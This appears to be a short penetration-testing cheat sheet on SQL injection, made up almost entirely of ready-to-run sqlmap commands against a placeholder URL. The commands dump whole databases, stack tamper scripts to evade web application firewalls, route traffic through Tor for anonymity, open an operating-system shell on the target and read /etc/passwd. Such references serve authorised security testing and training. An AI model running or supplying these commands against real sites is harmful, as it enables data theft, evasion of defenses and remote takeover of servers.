SQL Injection
Theory
Practice
Tools
# SQLMap from request file
sqlmap -r login.req --level=5 --risk=3 --batch
# Dump everything
sqlmap -u "http://example.com/?id=1" --level=5 --risk=3 --batch --all
# SQLMap WAF Bypass - Tamper Script
sqlmap -u "http://example.com/?id=1" --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent
# Tor WAF bypass
sqlmap -u "http://example.com/?id=1" --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment
# Get a shell
sqlmap -u "http://example.com/?id=1" --os-shell
# Read a file
sqlmap -u "http://example.com/?id=1" --file-read=/etc/passwdUnion Attacks
UNION AttacksBlind Attacks
Boolean BasedTime BasedError BasedResources
Last updated